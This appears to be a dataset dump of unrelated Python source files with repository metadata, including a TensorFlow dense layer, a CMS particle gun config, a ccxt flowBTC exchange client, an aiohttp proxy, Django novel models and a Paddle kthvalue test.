inputs = tf.convert_to_tensor(inputs)
n_inputs = inputs.get_shape()[-1].value
with tf.variable_scope(name, reuse=reuse):
W = tf.get_variable('W', shape=[n_inputs, n_units], initializer=W_init, dtype=tf.float32,
**W_init_args)
if use_bias:
b = tf.get_variable('b', shape=[n_units], initializer=b_init, dtype=tf.float32,
**b_init_args)
# outputs = act(tf.matmul(inputs, W) + b)
outputs = activation(tf.nn.xw_plus_b(inputs, W, b))
else:
outputs = activation(tf.matmul(inputs, W))
return outputs
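# Minimal usage sketch (TF1-style graph; shapes and names are illustrative):
#
# x = tf.placeholder(tf.float32, [None, 128])
# h = dense(x, 64, activation=tf.nn.relu, name="fc1")   # -> [None, 64]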
|
[
"[email protected]"
] | |
df84bf9d01fc1b6084257e37167497a0c70e75dd
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/Configuration/Generator/python/SingleElectronFlatPt5To100_pythia8_cfi.py
|
37df2ba0d8904688e35cfd867a38350252f6e5ef
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143 | 2023-08-22T20:22:40 | 2023-08-22T20:22:40 | 10,969,551 | 1,006 | 3,696 |
Apache-2.0
| 2023-09-14T19:14:28 | 2013-06-26T14:09:07 |
C++
|
UTF-8
|
Python
| false | false | 813 |
py
|
import FWCore.ParameterSet.Config as cms
generator = cms.EDFilter("Pythia8PtGun",
PGunParameters = cms.PSet(
        MinPt = cms.double(5.),
        MaxPt = cms.double(100.),
ParticleID = cms.vint32(11),
AddAntiParticle = cms.bool(True),
MaxEta = cms.double(2.5),
MaxPhi = cms.double(3.14159265359),
MinEta = cms.double(-2.5),
MinPhi = cms.double(-3.14159265359) ## in radians
),
Verbosity = cms.untracked.int32(0), ## set to 1 (or greater) for printouts
psethack = cms.string('single electron pt 5 to 100'),
firstRun = cms.untracked.uint32(1),
PythiaParameters = cms.PSet(parameterSets = cms.vstring())
)
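# Note: with AddAntiParticle=True the gun emits an e+ alongside each e-,
# flat in pT between MinPt and MaxPt and within |eta| < 2.5.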
|
[
"[email protected]"
] | |
7c258ecc296b93e65bf8e0cbc5b9c3df0c21f607
|
21818228cb62d31b9685de44deb27cfd90430573
|
/ccxt/flowbtc.py
|
2153a8b8e285212a60a2754aaf3d616c1ebb77d1
|
[] |
no_license
|
mico/cryptoArbitrage
|
d9d5d2f89e3fccc0b84d9c13b771edef0f2b00a1
|
ea9ef03e79f302b36948746c77e4acbb3d6f01b7
|
refs/heads/master
| 2021-03-22T00:17:30.448593 | 2018-05-28T05:08:21 | 2018-05-28T05:08:21 | 108,232,310 | 2 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,310 |
py
|
# -*- coding: utf-8 -*-
from ccxt.base.exchange import Exchange
from ccxt.base.errors import ExchangeError
class flowbtc (Exchange):
def describe(self):
return self.deep_extend(super(flowbtc, self).describe(), {
'id': 'flowbtc',
'name': 'flowBTC',
'countries': 'BR', # Brazil
'version': 'v1',
'rateLimit': 1000,
'hasCORS': True,
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/28162465-cd815d4c-67cf-11e7-8e57-438bea0523a2.jpg',
'api': 'https://api.flowbtc.com:8400/ajax',
'www': 'https://trader.flowbtc.com',
'doc': 'http://www.flowbtc.com.br/api/',
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
'uid': True,
},
'api': {
'public': {
'post': [
'GetTicker',
'GetTrades',
'GetTradesByDate',
'GetOrderBook',
'GetProductPairs',
'GetProducts',
],
},
'private': {
'post': [
'CreateAccount',
'GetUserInfo',
'SetUserInfo',
'GetAccountInfo',
'GetAccountTrades',
'GetDepositAddresses',
'Withdraw',
'CreateOrder',
'ModifyOrder',
'CancelOrder',
'CancelAllOrders',
'GetAccountOpenOrders',
'GetOrderFee',
],
},
},
})
def fetch_markets(self):
response = self.publicPostGetProductPairs()
markets = response['productPairs']
result = []
for p in range(0, len(markets)):
market = markets[p]
id = market['name']
base = market['product1Label']
quote = market['product2Label']
symbol = base + '/' + quote
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'info': market,
})
return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.privatePostGetAccountInfo()
balances = response['currencies']
result = {'info': response}
for b in range(0, len(balances)):
balance = balances[b]
currency = balance['name']
account = {
'free': balance['balance'],
'used': balance['hold'],
'total': 0.0,
}
account['total'] = self.sum(account['free'], account['used'])
result[currency] = account
return self.parse_balance(result)
def fetch_order_book(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
orderbook = self.publicPostGetOrderBook(self.extend({
'productPair': market['id'],
}, params))
return self.parse_order_book(orderbook, None, 'bids', 'asks', 'px', 'qty')
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
ticker = self.publicPostGetTicker(self.extend({
'productPair': market['id'],
}, params))
timestamp = self.milliseconds()
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': float(ticker['high']),
'low': float(ticker['low']),
'bid': float(ticker['bid']),
'ask': float(ticker['ask']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': float(ticker['last']),
'change': None,
'percentage': None,
'average': None,
'baseVolume': float(ticker['volume24hr']),
'quoteVolume': float(ticker['volume24hrProduct2']),
'info': ticker,
}
def parse_trade(self, trade, market):
timestamp = trade['unixtime'] * 1000
side = 'buy' if (trade['incomingOrderSide'] == 0) else 'sell'
return {
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': market['symbol'],
'id': str(trade['tid']),
'order': None,
'type': None,
'side': side,
'price': trade['px'],
'amount': trade['qty'],
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
response = self.publicPostGetTrades(self.extend({
'ins': market['id'],
'startIndex': -1,
}, params))
return self.parse_trades(response['trades'], market)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
orderType = 1 if (type == 'market') else 0
order = {
'ins': self.market_id(symbol),
'side': side,
'orderType': orderType,
'qty': amount,
'px': price,
}
response = self.privatePostCreateOrder(self.extend(order, params))
return {
'info': response,
'id': response['serverOrderId'],
}
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
if 'ins' in params:
return self.privatePostCancelOrder(self.extend({
'serverOrderId': id,
}, params))
raise ExchangeError(self.id + ' requires `ins` symbol parameter for cancelling an order')
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + self.version + '/' + path
if api == 'public':
if params:
body = self.json(params)
else:
self.check_required_credentials()
nonce = self.nonce()
auth = str(nonce) + self.uid + self.apiKey
signature = self.hmac(self.encode(auth), self.encode(self.secret))
body = self.json(self.extend({
'apiKey': self.apiKey,
'apiNonce': nonce,
'apiSig': signature.upper(),
}, params))
headers = {
'Content-Type': 'application/json',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def request(self, path, api='public', method='GET', params={}, headers=None, body=None):
response = self.fetch2(path, api, method, params, headers, body)
if 'isAccepted' in response:
if response['isAccepted']:
return response
raise ExchangeError(self.id + ' ' + self.json(response))
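# Illustrative usage sketch (credentials are placeholders; the market symbol
# is an assumption and must exist on the exchange):
#
# exchange = flowbtc({'apiKey': 'KEY', 'secret': 'SECRET', 'uid': 'UID'})
# print(exchange.fetch_ticker('BTC/BRL'))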
|
[
"[email protected]"
] | |
dcd8e325ace6b51794580b2b65cb39022b4d9256
|
837ebd601d0882e370522719606c975b9c815ad2
|
/adm/templates/plugins/mediation/{{cookiecutter.name}}/main/application.py
|
9ee876166f3b2151ae78f6033bb9438e0b514679
|
[
"BSD-3-Clause"
] |
permissive
|
dearith/mfserv
|
8ba97e211d31a177fc6de160cd4b1f8555ebf600
|
ad72e51bf77595a75dcb2600d7323f13e2c2fb4b
|
refs/heads/master
| 2021-08-15T21:17:30.528351 | 2019-04-25T10:25:58 | 2019-04-25T10:25:58 | 183,577,154 | 0 | 0 | null | 2019-04-26T07:10:44 | 2019-04-26T07:10:43 | null |
UTF-8
|
Python
| false | false | 2,141 |
py
|
from aiohttp import web, ClientSession
from aiohttp_metwork_middlewares import mflog_middleware
CHUNK_SIZE = 4096 * 1024
STREAMING_MODE = True
async def handle(request):
# Log something with context aware logger
log = request['mflog_logger']
http_method = request.method
url_path_qs = request.path_qs
log.info("got a %s call on %s" % (http_method, url_path_qs))
# For this example, we limit the service to GET/HEAD methods
if http_method not in ["GET", "HEAD"]:
return web.Response(status=405)
# Let's build the backend url
backend_url = "http://mybackend%s" % url_path_qs
async with ClientSession() as session:
log.info("calling %s on %s..." % (http_method, backend_url))
async with session.get(backend_url) as resp:
backend_status = resp.status
log.info("got an HTTP/%i status" % backend_status)
if not STREAMING_MODE:
######################
# NON STREAMING MODE #
######################
body = await resp.read()
response = web.Response(
headers={"Content-Type": resp.headers['Content-Type']},
body=body
)
else:
##################
# STREAMING MODE #
##################
# Let's prepare a streaming response
response = web.StreamResponse(
headers={"Content-Type": resp.headers['Content-Type']}
)
await response.prepare(request)
response.content_type = resp.headers['Content-Type']
# Let's stream the response body to avoid storing it in memory
while True:
chunk = await resp.content.read(CHUNK_SIZE)
if not chunk:
break
await response.write(chunk)
await response.write_eof()
return response
app = web.Application(middlewares=[mflog_middleware])
app.router.add_route('*', '/{tail:.*}', handle)
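# To serve this mediation locally one would typically run (port is illustrative):
# web.run_app(app, port=8080)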
|
[
"[email protected]"
] | |
c117af46846c1174ea7008f8552fa52b1505a9b8
|
ebbfc69c9b14b8fd0e8b51abb0ba4f767abce6e9
|
/sandbook/base/models/novel.py
|
3e4e8fdb929f8cfbc346753c49db9354d87a73f8
|
[] |
no_license
|
lwaxx/novel
|
0a882347dffaafb35f061eaf6301abe32254b54f
|
5b538e85606cd22c34ac10f53438fc0d3ff131a0
|
refs/heads/master
| 2022-06-30T03:21:52.673001 | 2020-05-09T15:26:58 | 2020-05-09T15:26:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,965 |
py
|
import os
import re
import time
from django.core.files.storage import FileSystemStorage
from django.db import models
from base.constants.novel import (
DEFAULT_COVER, NOVEL_STATUS_UNAPPROVED, NOVEL_STATUS_ACTIVE, NOVEL_STATUS_FINISHED,
NOVEL_STATUS_BLOCKED
)
from django.core.cache import cache
from general.utils.text import get_filename_extension, calc_word_count
class CategoryMixin:
@property
def novel_count_key(self):
raise NotImplementedError
def novel_count(self):
return cache.get(self.novel_count_key)
class Category(CategoryMixin, models.Model):
"""
    Primary (top-level) category
"""
name = models.CharField('名称', max_length=32)
description = models.CharField('描述', max_length=255)
class Meta:
db_table = 'base_novel_category'
def __str__(self):
return self.name
@property
def novel_count_key(self):
return 'sc_%d_count' % self.id
class SubCategory(CategoryMixin, models.Model):
"""
    Secondary category (belongs to a primary category)
"""
name = models.CharField('名称', max_length=32)
category = models.ForeignKey(Category, on_delete=models.CASCADE, verbose_name='一级分类')
description = models.CharField('描述', max_length=255)
class Meta:
db_table = 'base_novel_sub_category'
default_permissions = ()
def __str__(self):
return self.name
@property
def novel_count_key(self):
return 'c_%d_count' % self.id
def incr_novel_count(self, count: int):
"""
        count may be a positive or negative integer
"""
cache.incr(self.novel_count_key, count)
def cover_path(instance, filename):
new_name = '%s.%s' % (str(int(time.time())), get_filename_extension(filename))
return os.path.join('novel', 'cover', str(instance.author_id), new_name)
class Novel(models.Model):
"""
    Novel
"""
STATUS = {
'unapproved': NOVEL_STATUS_UNAPPROVED,
'active': NOVEL_STATUS_ACTIVE,
'finished': NOVEL_STATUS_FINISHED,
'blocked': NOVEL_STATUS_BLOCKED,
}
STATUS_CHOICES = (
(STATUS['unapproved'], '未审核'),
(STATUS['active'], '连载中'),
(STATUS['finished'], '已完结'),
(STATUS['blocked'], '已屏蔽')
)
    name = models.CharField('书名', unique=True, max_length=64)  # TODO: validate the book title
author = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True, verbose_name='作者')
intro = models.TextField('简介', max_length=1024)
status = models.SmallIntegerField('状态', choices=STATUS_CHOICES, default=NOVEL_STATUS_UNAPPROVED)
category = models.ForeignKey(Category, on_delete=models.SET_NULL, null=True, verbose_name='一级分类')
sub_category = models.ForeignKey(SubCategory, on_delete=models.SET_NULL, null=True, verbose_name='二级分类')
cover = models.ImageField(
'封面', storage=FileSystemStorage(), default=DEFAULT_COVER,
upload_to=cover_path, blank=True
)
word_count = models.PositiveIntegerField('字数', default=0)
created_at = models.DateTimeField('创建于', auto_now_add=True)
updated_at = models.DateTimeField('更新于', auto_now=True)
class Meta:
db_table = 'base_novel'
ordering = ('-id',)
default_permissions = ()
permissions = (
('view_novel', '查看小说'),
('create_novel', '创建小说'),
('change_novel', '更改小说'),
('delete_novel', '删除小说'),
('finish_novel', '完结小说'),
('block_novel', '屏蔽小说'),
('verify_novel', '审核小说')
)
class NovelComment(models.Model):
"""
    Book review (a comment on a novel)
"""
novel = models.ForeignKey(Novel, on_delete=models.CASCADE, verbose_name='小说', related_name='comments', )
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True, verbose_name='用户',
related_name='nc_user')
    title = models.CharField('标题', max_length=32, blank=True)  # the title is optional
content = models.CharField('内容', max_length=4096)
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_comment'
default_permissions = ()
class NovelCommentReply(models.Model):
"""
    Reply to a book review
"""
comment = models.ForeignKey(NovelComment, on_delete=models.CASCADE, related_name='replies',
verbose_name='书评')
content = models.CharField('内容', max_length=1024)
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True,
related_name='nc_reply_user', verbose_name='回复用户')
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_comment_reply'
default_permissions = ()
class Volume(models.Model):
"""
    Volume
"""
name = models.CharField('卷名', max_length=32, default='正文卷')
novel = models.ForeignKey(Novel, on_delete=models.CASCADE, verbose_name='小说')
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_volume'
default_permissions = ()
class Chapter(models.Model):
"""
    Chapter
"""
STATUS = {
'saved': 0,
'submitted': 1,
'blocked': 2,
        'approved': 3  # not used yet
}
STATUS_CHOICES = (
(STATUS['saved'], '已保存'),
(STATUS['submitted'], '已提交'),
(STATUS['blocked'], '已屏蔽'),
(STATUS['approved'], '已审核')
)
    title = models.CharField('标题', max_length=32, blank=True, default='新章节')  # TODO: validate the chapter title
content = models.TextField('内容', max_length=65535, blank=True)
volume = models.ForeignKey(Volume, on_delete=models.CASCADE, verbose_name='卷')
word_count = models.PositiveIntegerField('字数', default=0)
is_free = models.BooleanField('免费', default=True)
status = models.IntegerField('状态', choices=STATUS_CHOICES, default=STATUS['saved'])
created_at = models.DateTimeField('创建于', auto_now_add=True)
updated_at = models.DateTimeField('更新于', auto_now=True)
class Meta:
db_table = 'base_novel_chapter'
default_permissions = ()
# class ChapterUpdated(models.Model):
# ...
class Paragraph(models.Model):
"""
    Paragraph
"""
chapter = models.ForeignKey(Chapter, on_delete=models.CASCADE, verbose_name='章节')
    content = models.TextField('内容', max_length=65535)  # TODO: enforce a paragraph length limit
serial = models.PositiveIntegerField('序号', default=1)
class Meta:
db_table = 'base_novel_paragraph'
default_permissions = ()
unique_together = (('chapter', 'serial'),)
@property
def word_count(self):
return calc_word_count(self.content)
class ParagraphComment(models.Model):
"""
    Paragraph comment
"""
paragraph = models.ForeignKey(Paragraph, on_delete=models.CASCADE, verbose_name='段落')
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True, verbose_name='用户')
content = models.CharField('内容', max_length=1024)
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_paragraph_comment'
default_permissions = ()
class ParagraphCommentReply(models.Model):
"""
    Reply to a paragraph comment
"""
paragraph_comment = models.ForeignKey(ParagraphComment, on_delete=models.CASCADE, verbose_name='段评')
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True,
related_name='pc_reply_user', verbose_name='回复用户')
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_paragraph_comment_reply'
default_permissions = ()
|
[
"[email protected]"
] | |
dcd9d496ee0141ea04f9a8c83b711f5ce5252089
|
ffc1cc3bb7b68335b115122fdc7924fc4e31d528
|
/pro38.py
|
fd23c4fc45f9509da980b95618a4cae2a5d6442b
|
[] |
no_license
|
Rihanashariff/swathi24
|
dba1dd3c3d2ff583ae431b432e0ef262bfeb3ac3
|
2b0d21f2febdd2a563e8f0affeebd5ca7a5821b8
|
refs/heads/master
| 2020-07-02T05:28:32.199982 | 2019-06-29T08:22:10 | 2019-06-29T08:22:10 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 132 |
py
|
# Count how many list entries can absorb k more while staying <= 5,
# then report how many groups of three can be formed from them.
n, k = map(int, input().split())
values = list(map(int, input().split()))
eligible = sum(1 for v in values if v + k <= 5)
print(eligible // 3)
|
[
"[email protected]"
] | |
cc09ec3dc544f923a01256d80c96928a1ec33d28
|
0dc24a6e729a4b438fbcd9cfb72da3b6ee716d77
|
/ksiazka_zrob_to_sam/my_electric_car.py
|
10fbec7652bb7144eb706ddd63de707e5df80507
|
[] |
no_license
|
Licho59/learning_python_eric_matthes_book
|
fca84a2bff207c10dec20c7fea9aeacf05d6a101
|
969f95132822d8bd21c30403d8e0bf6aadb9914f
|
refs/heads/master
| 2021-09-01T03:41:37.281741 | 2017-12-24T15:12:13 | 2017-12-24T15:12:13 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 784 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 8 21:20:17 2017
@author: Leszek
"""
from car import ElectricCar
my_tesla = ElectricCar('tesla', 'model s', 2016)
print(my_tesla.get_descriptive_name())
my_tesla.battery.describe_battery()
my_tesla.battery.get_range()
# Importing multiple classes from a module
from car import Car, ElectricCar
my_beetle = Car('volkswagen', 'beetle', 2016)
print(my_beetle.get_descriptive_name())
my_tesla = ElectricCar('tesla', 'model s', 2016)
print(my_tesla.get_descriptive_name())
# Importing the whole module
import car
my_beetle = car.Car('volkswagen', 'beetle', 2016)
print(my_beetle.get_descriptive_name())
my_tesla = car.ElectricCar('tesla', 'model s', 2016)
print(my_tesla.get_descriptive_name())
# Importing all classes from the module
from car import *
|
[
"[email protected]"
] | |
5487773f243f788ebc92256016ebad447a41750c
|
d5f75adf5603927396bdecf3e4afae292143ddf9
|
/python/paddle/fluid/tests/unittests/test_kthvalue_op.py
|
66eb8ab4f31fba1ef8cb7eee8a8896077b683a1f
|
[
"Apache-2.0"
] |
permissive
|
jiweibo/Paddle
|
8faaaa1ff0beaf97ef7fb367f6c9fcc065f42fc4
|
605a2f0052e0ffb2fab3a4cf4f3bf1965aa7eb74
|
refs/heads/develop
| 2023-07-21T03:36:05.367977 | 2022-06-24T02:31:11 | 2022-06-24T02:31:11 | 196,316,126 | 3 | 2 |
Apache-2.0
| 2023-04-04T02:42:53 | 2019-07-11T03:51:12 |
Python
|
UTF-8
|
Python
| false | false | 6,945 |
py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
import paddle
import paddle.fluid as fluid
def cal_kthvalue(x, k, axis, keepdim=False):
if axis < 0:
axis = len(x.shape) + axis
indices = np.argsort(x, axis=axis)
value = np.sort(x, axis=axis)
indices = indices.take(indices=k - 1, axis=axis)
value = value.take(indices=k - 1, axis=axis)
if keepdim:
indices = np.expand_dims(indices, axis)
value = np.expand_dims(value, axis)
return value, indices
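# Worked example: cal_kthvalue(np.array([[3, 1, 2]]), k=2, axis=1)
# sorts each row to [1, 2, 3] and returns (array([2]), array([2])):
# the 2nd-smallest value is 2, located at index 2 of the original row.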
class TestKthvalueOp(OpTest):
def init_args(self):
self.k = 5
self.axis = -1
def setUp(self):
self.op_type = "kthvalue"
self.python_api = paddle.kthvalue
self.dtype = np.float64
self.input_data = np.random.random((2, 1, 2, 4, 10))
self.init_args()
self.inputs = {'X': self.input_data}
self.attrs = {'k': self.k, 'axis': self.axis}
output, indices = cal_kthvalue(self.input_data,
k=self.k,
axis=self.axis)
self.outputs = {'Out': output, 'Indices': indices}
def test_check_output(self):
paddle.enable_static()
self.check_output(check_eager=True)
def test_check_grad(self):
paddle.enable_static()
self.check_grad(set(['X']), 'Out', check_eager=True)
class TestKthvalueOpWithKeepdim(OpTest):
def init_args(self):
self.k = 2
self.axis = 1
def setUp(self):
self.init_args()
self.op_type = "kthvalue"
self.python_api = paddle.kthvalue
self.dtype = np.float64
self.input_data = np.random.random((1, 3, 2, 4, 10))
self.inputs = {'X': self.input_data}
self.attrs = {'k': self.k, 'axis': self.axis, 'keepdim': True}
output, indices = cal_kthvalue(self.input_data,
k=self.k,
axis=self.axis,
keepdim=True)
self.outputs = {'Out': output, 'Indices': indices}
def test_check_output(self):
paddle.enable_static()
self.check_output(check_eager=True)
def test_check_grad(self):
paddle.enable_static()
self.check_grad(set(['X']), 'Out', check_eager=True)
class TestKthvalueOpKernels(unittest.TestCase):
def setUp(self):
self.axises = [2, -1]
def test_kthvalue_op(self):
paddle.disable_static()
def test_cpu_kernel():
shape = (2, 128, 10)
k = 2
paddle.set_device('cpu')
inputs = np.random.random(shape)
tensor = paddle.to_tensor(inputs)
for axis in self.axises:
value_expect, indice_expect = cal_kthvalue(inputs, k, axis)
v, inds = paddle.kthvalue(tensor, k, axis)
self.assertTrue(np.allclose(v.numpy(), value_expect))
self.assertTrue(np.allclose(inds.numpy(), indice_expect))
def test_gpu_kernel():
shape = (2, 30, 250)
k = 244
paddle.set_device('gpu')
inputs = np.random.random(shape)
tensor = paddle.to_tensor(inputs)
for axis in self.axises:
value_expect, indice_expect = cal_kthvalue(inputs, k, axis)
v, inds = paddle.kthvalue(tensor, k, axis)
self.assertTrue(np.allclose(v.numpy(), value_expect))
self.assertTrue(np.allclose(inds.numpy(), indice_expect))
test_cpu_kernel()
if fluid.core.is_compiled_with_cuda():
test_gpu_kernel()
class TestKthvalueOpWithNaN(unittest.TestCase):
def setUp(self):
paddle.disable_static()
self.x = paddle.uniform([2, 200, 10], dtype='float32')
def test_errors(self):
def test_nan_in_cpu_kernel():
paddle.set_device('cpu')
nan_position = 100
self.x[0, nan_position, 2] = float('nan')
v, inds = self.x.kthvalue(k=200, axis=1)
self.assertTrue(np.isnan(v[0, 2].numpy()[0]))
self.assertEqual(inds[0, 2].numpy()[0], nan_position)
def test_nan_in_gpu_kernel():
paddle.set_device('gpu')
nan_position = 100
self.x[0, nan_position, 2] = float('nan')
v, inds = self.x.kthvalue(k=200, axis=1)
self.assertTrue(np.isnan(v[0, 2].numpy()[0]))
self.assertEqual(inds[0, 2].numpy()[0], nan_position)
test_nan_in_cpu_kernel()
if fluid.core.is_compiled_with_cuda():
test_nan_in_gpu_kernel()
class TestKthvalueOpErrors(unittest.TestCase):
def setUp(self):
self.x = paddle.uniform([2, 10, 20, 25], dtype='float32')
def test_errors(self):
paddle.disable_static()
def test_k_lowrange_error():
self.x.kthvalue(k=0, axis=2)
self.assertRaises(ValueError, test_k_lowrange_error)
def test_k_uprange_error():
self.x.kthvalue(k=500, axis=2)
self.assertRaises(ValueError, test_k_uprange_error)
def test_dim_range_error():
self.x.kthvalue(k=10, axis=5)
self.assertRaises(ValueError, test_dim_range_error)
class TestModeOpInStatic(unittest.TestCase):
def setUp(self):
np.random.seed(666)
self.input_data = np.random.random((2, 20, 1, 2, 80)).astype(np.float64)
self.k = 10
def test_run_static(self):
paddle.enable_static()
with paddle.static.program_guard(paddle.static.Program(),
paddle.static.Program()):
input_tensor = paddle.static.data(name="x",
shape=[2, 20, 1, 2, 80],
dtype="float64")
result = paddle.kthvalue(input_tensor, self.k, axis=1)
expect_value = cal_kthvalue(self.input_data, self.k, axis=1)[0]
exe = paddle.static.Executor(paddle.CPUPlace())
paddle_result = exe.run(feed={"x": self.input_data},
fetch_list=[result])[0]
self.assertTrue(np.allclose(paddle_result, expect_value))
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
a272e1b11c4ec4f975a6dd241d020af9876ef059
|
6d8ed9e06e7783443fac3d100a4fdea304d5d64e
|
/dashboard/internet_nl_dashboard/migrations/0036_urllistreport_average_internet_nl_score.py
|
de64746ac2b34bee044538ef4f70302d905e030b
|
[
"Apache-2.0"
] |
permissive
|
internetstandards/Internet.nl-dashboard
|
399c6d13d66bbc56b1a5b964a727cc299d351bd8
|
f1f68352a173689e2386d790f69bd28640a75e09
|
refs/heads/main
| 2023-08-31T21:01:42.739287 | 2023-07-12T10:51:16 | 2023-07-12T10:51:16 | 175,843,928 | 7 | 8 |
Apache-2.0
| 2023-09-13T08:45:51 | 2019-03-15T15:16:49 |
JavaScript
|
UTF-8
|
Python
| false | false | 667 |
py
|
# Generated by Django 2.2.2 on 2019-06-28 07:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('internet_nl_dashboard', '0035_auto_20190624_0712'),
]
operations = [
migrations.AddField(
model_name='urllistreport',
name='average_internet_nl_score',
field=models.FloatField(
                default=0, help_text='Internet.nl scores are retrieved in points. The calculation done for that is complex and subject to change over time. Therefore it is impossible to re-calculate that score here. Instead the score is stored as a given.'),
),
]
|
[
"[email protected]"
] | |
b363e6a7cb06107e6b57f522269db06f2372e699
|
7be4f595d555614a28f708c1ba7edda321f0cf30
|
/practice/algorithms/implementation/find_digits/find_digits.py
|
944aa7f96b379dc5bf1efe15f35da50bb098ef74
|
[] |
no_license
|
orel1108/hackerrank
|
de31a2d31aaf8aeb58477d1f2738744bfe492555
|
55da1f3a94e8c28ed0f0dea3103e51774f0047de
|
refs/heads/master
| 2021-04-09T17:38:25.112356 | 2017-01-22T11:21:19 | 2017-01-22T11:21:19 | 50,198,159 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 153 |
py
|
t = int(raw_input())
for _ in range(t) :
n = raw_input()
digits = map(int, n)
print len(filter(lambda x: x > 0 and int(n) % x == 0, digits))
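# Example: for n = "12" both digits divide 12, so the answer is 2;
# zero digits are filtered out first to avoid division by zero ("10" -> 1).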
|
[
"[email protected]"
] | |
444d45bf3c5ac155b55dfd08b8250911a948e0c8
|
a550aece79bda789826b463280b91abffbf2d372
|
/books/python-3-oop-packt/Chapter7/7_28_callable_repeat.py
|
09746de64e095feb18df107627ebdb96c1fe1546
|
[
"MIT"
] |
permissive
|
phiratio/learn_python
|
20376470eaa292c157fd01f52b3077e3a983cd5a
|
a32240d4355fb331805d515f96e1d009914e5c47
|
refs/heads/master
| 2022-11-27T07:07:45.712373 | 2020-12-03T22:04:31 | 2020-12-03T22:04:31 | 189,397,679 | 1 | 0 |
MIT
| 2022-11-22T04:40:27 | 2019-05-30T10:56:10 |
Python
|
UTF-8
|
Python
| false | false | 469 |
py
|
from timer import Timer
import datetime
def format_time(message, *args):
now = datetime.datetime.now().strftime("%I:%M:%S")
print(message.format(*args, now=now))
class Repeater:
def __init__(self):
self.count = 0
def __call__(self, timer):
format_time("{now}: repeat {0}", self.count)
self.count += 1
timer.call_after(5, self)
timer = Timer()
timer.call_after(5, Repeater())
format_time("{now}: Starting")
timer.run()
|
[
"[email protected]"
] | |
088099fe03d5e3dee4df77f61ea5cb2aa08d45d5
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/M8hDPzNZdie8aBMcb_11.py
|
f8aa226b0f1d8e00377c89c45f1f158d226792c3
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 737 |
py
|
"""
Implement a function count_substring that counts the number of substrings that
begin with character "A" and ends with character "X".
For example, given the input string `"CAXAAYXZA"`, there are four substrings
that begin with "A" and ends with "X", namely: "AX", "AXAAYX", "AAYX", and
"AYX".
### Examples
count_substring("CAXAAYXZA") ➞ 4
count_substring("AAXOXXA") ➞ 6
count_substring("AXAXAXAXAX") ➞ 15
### Notes
* You should aim to avoid using nested loops to complete the task.
* You can assume that the input string is composed of English upper case letters only.
"""
def count_substring(txt: str) -> int:
return sum(txt[i:].count('X') for i,v in enumerate(txt[:-1]) if v == 'A')
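# Sanity checks against the docstring examples:
if __name__ == "__main__":
    assert count_substring("CAXAAYXZA") == 4
    assert count_substring("AAXOXXA") == 6
    assert count_substring("AXAXAXAXAX") == 15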
|
[
"[email protected]"
] | |
5458665911175eba625d5f5b7fc0cc7853562425
|
9d82e37d34ed4d836fcef98ed37ed7ac5c49b316
|
/ibmsecurity/isam/web/embedded_ldap/admin.py
|
a068695630ebb77e72b212d90faed1a94943d4d2
|
[
"Apache-2.0"
] |
permissive
|
keiran-ibm/ibmsecurity
|
075c156961e371c0e85a7c360fb2d82954315bb6
|
b1a77f7a1e8c3cce67e2c3af85c20626d42c0bbd
|
refs/heads/master
| 2022-02-14T14:24:15.687461 | 2019-01-18T05:21:19 | 2019-01-18T05:21:19 | 116,325,033 | 0 | 0 |
Apache-2.0
